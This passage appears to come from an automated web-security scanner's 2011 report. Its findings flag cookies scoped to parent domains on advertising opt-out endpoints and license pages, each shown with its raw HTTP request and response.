Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout&nocache=4.743993E-02 HTTP/1.1
Host: optout.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optouts=cookies; RMOPTOUT=3; NSC_pqupvu_qppm_iuuq=ffffffff0941323f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: optouts=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: RMOPTOUT=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: NSC_pqupvu_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:53:49 GMT; path=/; domain=.mookie1.com
Set-Cookie: optouts=cookies; expires=Sat, 09-Nov-2024 18:53:49 GMT; path=/; domain=.mookie1.com
Set-Cookie: RMOPTOUT=3; expires=Sat, 09-Nov-2024 18:53:49 GMT; path=/; domain=.mookie1.com
Location: /optout/nai/index.php?action=optout&nocache=4.743993E-02&check_cookie=true
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



5.5. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:55:23 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/1.0.0e DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6falf9ou8puu4kncne5d3aqjo6; expires=Tue, 06-Dec-2011 22:28:43 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 13 Nov 2011 18:46:38 GMT
ETag: "3b79820f8d6a6383caa42e6c3b5a9ef1"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

5.6. http://api.aggregateknowledge.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.aggregateknowledge.com
Path:   /optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout HTTP/1.1
Host: api.aggregateknowledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.aggregateknowledge.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 11-Nov-2016 18:57:24 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 2694
Date: Sun, 13 Nov 2011 18:57:24 GMT
Connection: close


<html>
<head>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<title>Aggregate Knowledge</title>
<link href="/css/style_optout.css" rel="stylesheet" type="text/css">
<style>
#content_wrap, #content_le
...[SNIP]...

5.7. http://api.aggregateknowledge.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.aggregateknowledge.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&nocache=0.5774614 HTTP/1.1
Host: api.aggregateknowledge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.aggregateknowledge.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 11-Nov-2016 18:53:42 GMT; Path=/
Location: http://api.agkn.com/optout2?s=nai&dc=1
Content-Language: en-US
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:42 GMT
Connection: close


5.8. http://api.agkn.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.agkn.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&dc=1 HTTP/1.1
Host: api.agkn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Fri, 11-Nov-2016 18:53:43 GMT; Path=/
Location: http://api.aggregateknowledge.com/optout2?s=nai&q=validate
Content-Language: en-US
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:43 GMT
Connection: close


5.9. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/optout?nai=true&id=1936234986&nocache=0.7506367 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=15363377|-917800724

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sun Nov 13 18:53:44 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Fri, 01-Dec-2079 22:07:51 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.7506367&tu=1
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:44 GMT
Connection: close


5.10. https://console.turn.com/include/formAction.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://console.turn.com
Path:   /include/formAction.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /include/formAction.htm HTTP/1.1
Host: console.turn.com
Connection: keep-alive
Content-Length: 91
Cache-Control: max-age=0
Origin: https://console.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://console.turn.com/login/forgotPassword.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; SIFR-PREFETCHED=true

actionControler=ForgotPassword&GUID=3333672997611656568&emailAddress=weedw&btnSubmit=Submit

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: guid=3333672997611656568%3A%2Flogin%2FforgotPassword.htm%7Cfalse3333672997611656568%3A%2Flogin%2FforgotPassword.htm%7Cfalse; Domain=.turn.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:44 GMT
Content-Length: 4218


                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Co
...[SNIP]...

5.11. http://developer.yahoo.net/yui/license.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.net
Path:   /yui/license.txt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yui/license.txt HTTP/1.1
Host: developer.yahoo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:57:31 GMT
Set-Cookie: BX=00t849h7c04or&b=3&s=bd; expires=Tue, 13-Nov-2013 20:00:00 GMT; path=/; domain=.yahoo.net
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3311

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

5.12. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout?optout&nocache=0.3251545 HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=OPTOUT; c=1

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:42 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: u=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: b=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: n=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: s=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: f=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: e=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: t=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: c=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: p=OPTOUT; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Location: http://img.pulsemgr.com/optout?oochk&user=OPTOUT
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://img.pulsemgr.com/optout?oochk&amp;user=O
...[SNIP]...

5.13. http://info.yahoo.com/nai/optout.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.yahoo.com
Path:   /nai/optout.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/optout.html?token=cVRuZVptSHJ4UjM- HTTP/1.1
Host: info.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; CH=AgBOpL8gAC6fIAAHciAAMXwgAB/fIAAABiAAAV0gAAIyIAAh5yAAJo8gACrM

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AO=o=1; expires=Thu, 13-Nov-2031 15:09:03 GMT; path=/; domain=.yahoo.com
Set-Cookie: B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; expires=Wed, 13-Nov-2013 18:53:43 GMT; path=/; domain=.yahoo.com
Location: http://open.ad.yieldmanager.net/V1/NWSetter?nwid1=20072115599&url=http://info.yahoo.com/nai/nai-verify.html?optoutverify=true%26opter=nai&XTS=1321210423&XSIG=0~d5fc1b609f1ce455e216ef1819125ff12eafa53b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 81

<!-- w1.help.sp2.yahoo.com uncompressed/chunked Sun Nov 13 18:53:43 UTC 2011 -->

5.14. http://load.exelator.com/load/OptOut.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/OptOut.php?service=outNAI&nocache=0.662912 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; DNP=eXelate+OptOut; EVX=eJxVzjEOhDAMRNG75AQeJ8bBOYxFSU2JuDuLDEm2fpqv2Qx2HkaWUttstXM3aoehWoJCXZ2pOCmcHanthqH1p3i0kudQ7so0bSU0d83LpBRahq5vmUdZ%252FvXZouDTpatgKiNUu6pMWkLr0PqV5X11XTeYRkec

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Cache-Control: no-cache, must-revalidate
Location: http://load.exelator.com/load/OptOut.php?service=verifyNAI
Set-Cookie: DNP=eXelate+OptOut; expires=Wed, 10-Nov-2021 18:53:43 GMT
Set-Cookie: DNP=eXelate+OptOut; expires=Wed, 10-Nov-2021 18:53:43 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT
Set-Cookie: EVX=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/
Set-Cookie: EVX=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=exelator.com
Content-type: text/html
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:43 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2


5.15. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1230812852 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1230812852

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.ad.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.ad.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Location: http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=2&participant_id=4&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.16. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=411946761 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=411946761

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserver.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserver.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserver.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserver.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Location: http://nai.adserver.adtechus.com/nai/daa.php?action_id=2&participant_id=5&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.17. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=633460859 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=633460859

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserverec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserverec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserverec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserverec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Location: http://nai.adserverec.adtechus.com/nai/daa.php?action_id=2&participant_id=6&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.18. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

